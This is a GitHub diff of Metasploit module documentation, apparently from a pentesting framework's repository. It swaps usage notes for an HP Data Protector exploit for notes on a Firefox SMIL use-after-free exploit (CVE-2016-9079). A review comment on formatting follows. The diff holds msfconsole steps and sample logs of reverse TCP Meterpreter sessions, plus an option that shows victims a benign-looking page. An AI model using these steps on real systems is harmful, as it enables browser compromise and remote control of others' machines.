actually save the correct module doc
Showing 1 changed file with 31 additions and 58 deletions.
documentation/modules/exploit/windows/browser/firefox_uaf_smil.md
@@ -1,75 +1,48 @@ | ||
HP Data Protector is an automated backup and recovery software for single-server to enterprise | ||
environments. It provides cross-platform, online backup of data for Microsoft Windows, Unix, | ||
and Linux operating systems. | ||
|
||
While the server is using Encrypted Control Communication, HP Data Protector allows a remote | ||
attacker to gain access without authentication, and gain arbitrary code execution under the | ||
context of SYSTEM. | ||
Mozilla Firefox is a free, open-source web browser developed and maintained by the Mozilla Foundation. Multiple versions are affected by a use-after-free vulnerability, detailed by CVE 2016-9079, that can result in arbitrary remote code execution. | ||
|
||
|
||
## Vulnerable Application | ||
|
||
HP Data Protector versions 7, 8, and 9 are known to be affected. | ||
|
||
hp_dataprotector_encrypted_comms was specifically tested against version 9.0.0 on Windows 2008. | ||
|
||
## Verification Steps | ||
|
||
**Installing HP Data Protector** | ||
|
||
Before installing HP Data Protector, a Windows domain controller is needed. This exploit was tested | ||
against [a Windows Server 2008 R2 SP1 domain controller](https://www.youtube.com/watch?v=Buj9oEgbRt8). | ||
|
||
After setting up the domain controller, double-click on the HP Data Protector installer, and you | ||
should see this screen: | ||
|
||
![screen_1](https://cloud.githubusercontent.com/assets/13082457/15794665/99a86238-29e4-11e6-8ccd-0e09b0c8a693.png) | ||
The vulnerability is present in all releases of Mozilla Firefox prior to 50.0.2 | ||
|
||
Click on **Install Data Protector**. And then the installer should ask you which installation type: | ||
Firefox 38 through 41 were specifically chosen as targets for this module, though support for more releases is planned. | ||
|
||
![screen_2](https://cloud.githubusercontent.com/assets/13082457/15794701/de31d07e-29e4-11e6-9410-0b88abe77afe.png) | ||
## Usage | ||
|
||
Make sure to select **Cell Manager**, and click **Next**. Use all default settings. | ||
# UsePostHTML module option | ||
|
||
**Enabling Encrypted Communication** | ||
The module includes an option named UsePostHTML which is turned off by default. Setting this option to true will result in the module sending an HTML page to the target to be rendered after successful exploitation. This can be useful in convincing the target that they have arrived at a legitimate, benign website. If desired, please edit $datadirectory/exploits/firefox_smil_uaf/post.html to suit your needs. The included example file more than likely won't be suitable for your purposes. | ||
|
||
After the Setup Wizard is finished, we need to enable encrypted communication. First, open the | ||
Data Protector GUI: | ||
|
||
![screen_3](https://cloud.githubusercontent.com/assets/1170914/15845344/d3a84ee4-2c37-11e6-821d-fe8002c94686.png) | ||
|
||
Click on **Clients**, and the local client from the tree. You should see the **Connection** tab on the | ||
right, click on that. | ||
|
||
![screen_4](https://cloud.githubusercontent.com/assets/1170914/15845351/df9929f8-2c37-11e6-9d82-8c519c030a5f.png) | ||
|
||
Under the Connection tab, there should be an **Encrypted control communication** checkbox, make | ||
sure that is checked. And then click **Apply** | ||
|
||
**Using hp_dataprotector_encrypted_comms** | ||
|
||
After the encrypted communication is enabled, you are ready to use | ||
hp_dataprotector_encrypted_comms. Here is what you do: | ||
**Using firefox_smil_uaf** | ||
|
||
1. Start msfconsole | ||
2. Do: ```use exploit/windows/misc/hp_dataprotector_encrypted_comms``` | ||
3. Do: ```set RHOST [IP ADDRESS]``` | ||
2. Do: ```use exploit/windows/browser/firefox_smil_uaf``` | ||
3. Do: ```set payload [PREFERRED PAYLOAD] | ||
4. Do: ```set PAYLOAD [PAYLOAD NAME]``` | ||
5. Set other options as needed | ||
6. Do: ```exploit```, and you should receive a session like the following: | ||
5. Set payload options as needed | ||
6. Do: ```run```, and have a target browse to the generated URL | ||
7. Once a vulnerable target connects, you should receive a session like this: | ||
|
||
``` | ||
msf exploit(hp_dataprotector_encrypted_comms) > run | ||
[*] Started reverse TCP handler on 172.16.23.1:4444 | ||
[*] 172.16.23.173:5555 - Initiating connection | ||
[*] 172.16.23.173:5555 - Establishing encrypted channel | ||
[*] 172.16.23.173:5555 - Sending payload | ||
[*] 172.16.23.173:5555 - Waiting for payload execution (this can take up to 30 seconds or so) | ||
[*] Sending stage (957999 bytes) to 172.16.23.173 | ||
[*] Meterpreter session 1 opened (172.16.23.1:4444 -> 172.16.23.173:49304) at 2016-06-06 22:16:54 -0500 | ||
[*] Exploit running as background job. | ||
[*] Started reverse TCP handler on 192.168.79.132:6789 | ||
[*] Using URL: http://192.168.79.132:4567/lol | ||
[*] Server started. | ||
msf exploit(firefox_smil_uaf) > [*] 192.168.79.184 firefox_smil_uaf - Got request: /lol/ | ||
[*] 192.168.79.184 firefox_smil_uaf - From: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko/20100101 Firefox/38.0 | ||
[*] 192.168.79.184 firefox_smil_uaf - Sending exploit HTML ... | ||
[*] 192.168.79.184 firefox_smil_uaf - Got request: /lol/worker.js | ||
[*] 192.168.79.184 firefox_smil_uaf - From: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko/20100101 Firefox/38.0 | ||
[*] 192.168.79.184 firefox_smil_uaf - Sending worker thread Javascript ... | ||
[*] Sending stage (957487 bytes) to 192.168.79.184 | ||
[*] Meterpreter session 1 opened (192.168.79.132:6789 -> 192.168.79.184:52341) at 2017-01-20 11:25:38 -0600 | ||
[*] Session ID 1 (192.168.79.132:6789 -> 192.168.79.184:52341) processing InitialAutoRunScript 'migrate -f' | ||
[*] Running module against WIN-UTRINKNPT3D | ||
[*] Current server process: firefox.exe (1448) | ||
[*] Spawning notepad.exe process to migrate to | ||
[+] Migrating to 2572 | ||
[+] Successfully migrated to process 2572 | ||
meterpreter > getuid | ||
Server username: NT AUTHORITY\SYSTEM | ||
``` | ||
|
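Review bot: Step 3 of the numbered list in the new **Using firefox_smil_uaf** section has an unclosed code span (```set payload [PREFERRED PAYLOAD] with no closing backticks) and duplicates the unchanged step 4 (```set PAYLOAD [PAYLOAD NAME]```), so the list now tells the reader to set the payload twice and the broken span will swallow the following text when rendered; drop one of the two steps and close the span. Three smaller points in the same hunk: the identifier on the first added line is written "CVE 2016-9079" and should be "CVE-2016-9079"; "# UsePostHTML module option" is a level-1 heading placed under "## Usage", which inverts the hierarchy the rest of the file uses (the sibling subsection is bold text, **Using firefox_smil_uaf**), so make it a level-3 heading or bold text; and "prior to 50.0.2" is missing its terminating period. The path "$datadirectory/exploits/firefox_smil_uaf/post.html" should say what $datadirectory stands for, since it is not a variable a reader can expand. Finally, the sample session ends with "Server username: NT AUTHORITY\SYSTEM" after migrating out of firefox.exe; a browser exploit normally lands in the context of the user running the browser, so the doc should say how Firefox was launched in this test so readers do not expect SYSTEM by default.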